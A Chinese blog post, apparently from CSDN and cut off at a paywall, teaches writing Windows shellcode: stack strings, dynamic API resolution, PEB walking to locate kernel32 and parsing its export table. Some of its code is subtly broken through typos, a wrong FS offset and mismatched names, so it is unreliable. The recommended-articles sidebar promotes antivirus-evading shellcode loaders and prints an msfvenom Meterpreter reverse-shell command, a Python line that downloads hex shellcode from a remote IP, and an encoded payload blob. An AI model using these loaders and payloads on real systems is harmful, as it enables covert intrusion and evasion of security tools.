shellcode加载器

最新推荐文章于 2024-08-13 10:17:31 发布
最新推荐文章于 2024-08-13 10:17:31 发布
阅读量1.6k 收藏
点赞数
分类专栏: 汇编 文章标签: c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/goat_2003/article/details/120182656
版权
本文介绍了如何在编写shellcode时避免使用绝对地址,通过动态获取函数地址来实现调用,如GetProcAddress和LoadLibraryA。示例中展示了如何调用MessageBoxA并传递字符串。此外,还提到了利用 CreatFileA 函数来创建自定义函数类型以增加灵活性。文章还探讨了PEB、TEB结构体和FS寄存器在查找kernel32.dll基址中的作用,以解决GetProcAddress本身的绝对地址问题。
摘要由CSDN通过智能技术生成

不能有全局变量 (其实也是使用了绝对地址)

不能使用常量字符串

char szBuffer[] = "ShellCode"; //会使用常量区,所以不可用

//写成
char szBuffer[] = {
   'S', 'h', 'e', 'l', '\0'}; //这个使用堆栈

char szBuffer[] = {
   'K', '0', 'e', '0', '\0'}; //UNICODE格式,高字节为零,占2个字符,一般函数名为UinCode格式

编写shellcode不能使用绝对地址,因为当我们加载到其他函数中时绝对地址储存的可能什么也没有,甚至是其他函数,所以当我们需要调用一个函数时,需要动态获取函数的地址实现调用。
想要动态获取函数地址,可以使用以下函数
GetProcAddress 从dll中获取函数的地址
LoadLibraryA 将指定的模块加载到调用进程的地址空间中
举个例子:

LPVOID lp = GetProcAddress(LoadLibraryA("user32.dll"),"MessageBoxA");
_asm
{
   
	push 0
	push 0
	push 0
	push 0
	call lp
}

这样就可以获取到MessageBoxA函数的地址,并且通过汇编代码实现了调用。
当然如果我们想要在MessageBoxA函数中输出一个字符串的话,可以设置一个字符串指针:
char * pszData =“helloworld”;
并且修改对应的push 参数就可以了。
这种方法可行,但是并不灵活,再看一下更加灵活的方式
用 CreatFileA 函数来演示一下

int entrymain()
{
   
	typedef HANDLE (WINAPI* FN_CreateFileA)(
	__in	 LPCSTR lpFileName,
	__in	 DWORD dwDesiredAccess,
	__in	 DWORD dwShareMode,
	__in	 LPSECURITY_ATTRIBUTES lpSecruityAttributes,
	__in	 DWORD dwCreationDisposition,
	__in	 DWORD dwFlagsAndAttributes,
	__in_opt HANDLE hTemplateFile
	);
	FN_CreatFileA fn_CreateFileA;
	fn_CreateFileA = (FN_CreatFileA)GetProcAddress(LoadLibraryA("kernel32.dll"),"CreateFileA");
	CreatFileA("hello.txt",GENERIC_WRITE,0,NULL,CREAT_ALWAYS,0,NULL);
}

我们可以自定义一个与想调用的函数一样的新类型,这样我们就可以随便使用,因为这个函数是我们自定义的函数。
当然,明眼的人可能已经发现,我们在使用GetProcAddress函数去获得函数的地址时,GetProcAddress函数本身不就已经是调用的绝对地址了吗?当然LoadLibraryA函数也一样。
这里我们就需要了解一下PEB和TEB与FS寄存器,FS0偏移处是teb结构体,30h偏移处是PEB结构体,而PEB结构体中有三个成员链表分别储存了三个顺序,代码中有详解。通过这三个顺序我们分别可以使用三个方法获得kernel32的基址。获取这个基址的方法还有很多,推荐一篇博客

__declspec(nacked) DWORD getKernel32()
{
   
	__asm
	{
   
		mov eax,fs:[30]   //fs:[30] 纯存的是PEB,也就是进程环境块,操作系统在加载进程的过程中会自动初始化一个PEB结构体用来初始化该进程的各种信息的结构体
		mov eax,[eax+0ch]    //也就是PEB 0ch处的偏移,该结构体的三个成员链表都可以获取kernel32的基址
		mov eax,[eax+14h]    //获取初始化顺序链表的地址,首地址是第一个模块
		mov eax,[eax]        //第二个模块
		mov eax,[eax]        //第三个模块
		mov eax,[eax+10h]    // 10h偏移处就是kernel32的基地址
	}
}

看完上面的代码,会有疑惑,为什么是第三个参数呢?看下图,是因为kernel32.dll是第三个被加载的dll文件。
pe文件运行时加载的链接库

FARPROC _GetProcAddress(HMODULE hModuleBase) 
{
   
    PIMAGE_DOS_HEADER lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase;
    PIMAGE_NT_HEADERS32 lpNtHeader = (PIMAGE_NT_HEADERS)((DWORD)hModuleBase + lpDosHeader->e_lfanew);
    if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size){
   
        return NULL;
    }
    if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) {
   
        return NULL;
    }
    PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)((DWORD)hModuleBase + (DWORD)lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    PDWORD lpdwFunName = (PDWORD)((DWORD)hModuleBase +
最低0.47元/天 解锁文章
再搭环境是狗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第15节 编写shellcode加载
imbyter师哥的博客
05-14 371
我最近在做一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。我们编写一个最简单的shellcode加载工具,应用于将本地的shellcode文件执行起来。一个人走得再快,不如一群人走得更远!
NimShellCodeLoader:使用nim编写的shellcode加载
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin中存放生成的重组文件 encryption存储加密代码文件 module中存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption中的Tdea.nim和Caesar.nim 。 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹中 拓展: 1,新建ni
c++shellcode加载
qq_44657899的博客
05-26 3576
文章目录VirtualAlloc申请内存堆 VirtualAlloc申请内存 #include <windows.h> #include <iostream> #include <time.h> #pragma comment (lib, "winmm.lib") #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") void startShellCode() { unsi
免杀基本知识,shellcode混淆免杀
白帽子凯哥聊黑客
06-17 1254
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
免杀之浅谈shellcode加载
qq_46217803的博客
12-26 1808
VirtualAlloc:申请一个虚拟地址的空间,可以说为虚拟空间到物理空间的映射,简单来说,在虚拟空间操作,物理空间就会自动的分配物理地址。可以直接在内存中运行,不需要一个完整的pe结构,简单来说,内存能执行就能运行,没有啥依赖的“生存环境”设置一个指针类型的,也可以是别的,这里设置成NULL,这样系统会自动的去分配一个空间区域。就是一个类型属性,主要是内存分配的类型属性,可以去百度的,这里设置了两个值,去了解一下。还是以上的shellcode,本地生成的,用的是Visual Studio。
探索Shellcode_Loader:一款高效、灵活的Shellcode加载
gitblog_00002的博客
04-22 643
探索Shellcode_Loader:一款高效、灵活的Shellcode加载 项目地址:https://gitcode.com/Avienma/shellcode_loader 在安全研究和逆向工程领域,Shellcode是一个关键元素,它是一段可以直接由处理执行的小型机码程序。然而,如何安全且有效地加载这些代码并不总是那么简单。这就是Shellcode_Loader项目的用武之地。本文将带...
多种基础Shellcode加载
Liyu_6618的博客
02-02 710
多种编程语言Shellcode的模板
基于Java实现的Shellcode加载源码+项目说明.zip
12-29
基于Java实现的Shellcode加载源码+项目说明.zip基于Java实现的Shellcode加载源码+项目说明.zip基于Java实现的Shellcode加载源码+项目说明.zip基于Java实现的Shellcode加载源码+项目说明.zip
基于Java实现的Shellcode加载
07-16
【作品名称】:基于Java实现的Shellcode加载 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: ava ShellCode Loader...
python编写shellcode_python生成shellcode加载
weixin_39763293的博客
12-19 500
import ctypes, cPickle, base64, urllib2class ptr(object):def __reduce__(self):return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64class buf(object):def __init...
绕过AV:免杀shellcode加载
03-04
旁路AV 条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
使用shellcode动态加载dll-易语言
06-11
注入dll,执行代码啥的
SimpleShellcode:利用图片隐写术来远程动态加载shellcode
05-27
0x01 前言 将Shellcode隐写到正常BMP图片中,把字符串拆成字节,写入每个像素的alpha通道中,然后上传到可信任的网站下偏移拼接shellcode进行远程动态加载,能有效地增加了免杀性和隐匿性。 0x02 参考链接
go-shellcode:将Shellcode加载到新进程中
02-06
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
shellcode 执行盒
01-04
//msfvenom -p windows/exec CMD=calc.exe -f exe -e x86/shikata_ga_nai -i 6 -f c 生成shellcod 测试数据: bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 将shellcode作为参数传入执行盒,./shllcode_Argv.exe bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 即可执行该段shellcode。 该exe可传vt查看报毒情况,无特征码
什么是shellcode加载
最新发布
m0_57836225的博客
08-13 130
在安全领域,恶意的 Shellcode 加载常用于网络攻击和恶意软件中,对系统的安全构成威胁。4. 执行控制转移:通过某种方式将程序的执行流程转移到已写入的 Shellcode 所在的内存地址,从而开始执行 Shellcode 中的指令。Shellcode 通常是一段精心编写的机码,用于在目标系统上执行特定的恶意或非恶意操作,比如获取系统权限、执行特定功能等。1. 分配内存:加载首先在目标进程的内存空间中分配一段可执行的内存区域,用于存储即将加载Shellcode
浅入浅出Liunx Shellcode
weixin_34033624的博客
05-15 211
/*————————————-Author:旋木木[[email]xuanmumu@gmail.com[/email]]Date:2008/05/12Website:[url]www.bugshower.org[/url]————————————–*/ 一:什么是shellcode话说某天某爱国***编译了一个Nday溢出利用程序来***CNN,输入IP并且enter之后发现...
一个简单的ShellCode执行&代码(just for fun)
HingC~
11-13 3365
最近看到有个问题:如何做到在程序运行时读入并执行一段代码 这是很容易做到的,能够运行是因为冯·诺依曼结构中程序和数据并没有本质区别. 其实完全没有必要读入代码运行,动态链接库完全可以胜任这方面的需求 在运行时读入代码并执行其实是完全可行的,脚本语言更容易做到,当然了C/C++也可以,写个解释吧 考虑最简单的情况,何为代码?机械码算不算代码呢?当然算啦 我们先观察一下代码是怎
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值